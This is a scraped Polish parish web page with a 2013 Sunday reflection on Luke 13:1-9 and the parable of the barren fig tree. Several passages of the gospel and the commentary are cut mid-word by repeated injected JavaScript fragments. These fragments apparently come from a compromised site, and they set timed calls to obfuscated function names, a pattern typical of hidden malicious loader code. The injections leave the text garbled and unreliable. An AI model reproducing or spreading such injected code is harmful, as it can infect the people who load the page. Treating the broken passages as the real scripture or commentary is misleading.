wstazka
Kościół Świętego Ducha
Strona główna -> Niedzielne Rozkminy
Wpisał:adminicdmstracja Data: 03-03-2013
ikona

JAK OWOCUJESZ?

Ewangelia wg św. Łukasza 13,1-9.
W tym czasie przyszli niektórzy i donieśli Mu o Galilejczykach, których krew Piłat zmieszał
z krwią ich ofiar. Jezus im odpowiedział: «Czyż myślicie, że ci Galilejczycy byli większymi
grzesznikami niż inni mieszkańcy Galilei, że andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to ucierpieli? Bynajmniej, powiadam wam; lecz
jeśli się nie nawrócicie, wszyscy podobnie zginiecie. Albo myślicie, że owych osiemnastu,
na których zwaliła się wieża w Siloam i zabiła ich, było większymi winowajcami niż inni
mieszkańcy Jerozolimy? Bynajmniej, powiadam wam; lecz jeśli się nie nawrócicie, wszyscy
tak samo zginiecie».
I opowiedział im następującą przypowieść: «Pewien człowiek miał drzewo figowe zasadzone
w swojej winnicy; przyszedł i szukał na nim owoców, ale nie znalazł. Rzekł więc do
ogrodnika: „Oandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to już trzy lata, odkąd przychodzę i szukam owocu na tym drzewie figowym, a
nie znajduję. Wytnij je: po co jeszcze ziemię wyjaławia?” Lecz on mu odpowiedział: „Panie,
jeszcze na ten rok je pozostaw; ja okopię je i obłożę nawozem; może wyda owoc. A jeśli nie,
w przyszłości możesz je wyciąć”».

„…lecz jeśli się nie nawrócicie, wszyscy tak samo zginiecie.”
Dziś Pan Jezus wzywa nas do nawrócenia. W tym kontekście przedstawia nam przypowieść o
drzewie figowym, która zmusza nas do refleksji. Mi przychodzą dwie myśli. Pierwsza andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to czy
moje nawrócenie wydaje owoce? A jeśli wydaje andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to jakie one są. Czy rodzę dobre „smaczne”
owoce, czy może ciernie, które ranią innych? Druga myśl dotyczy ogrodnika. Postać ta
zapewne przypomina cierpliwego Boga Ojca, który mimo braku owoców ciągle obdarza
łaską i daje szansę na zmianę. Mi przyszła jednak myśl by zapytać siebie jakim ja jestem
ogrodnikiem? Czy ludzie z mojego oandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toczenie „rosną” przy mnie czy, raczej karłowacieją?
Czy daję im szansę na zmianę i pomagam piąć się w górę, czy od razu podcinam im korzenie?
W nadchodzącym tygodniu życzę dużo dobrych owoców, a na trudne chwile niech pociechą
będą nam słowa Boga do Mojżesza – który bał się iść do wielkiego Faraona:
„JA BĘDĘ Z TOBĄ” (Wj 3,12)

Szczęśliwy mąż
Grzegorz Kociuba

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video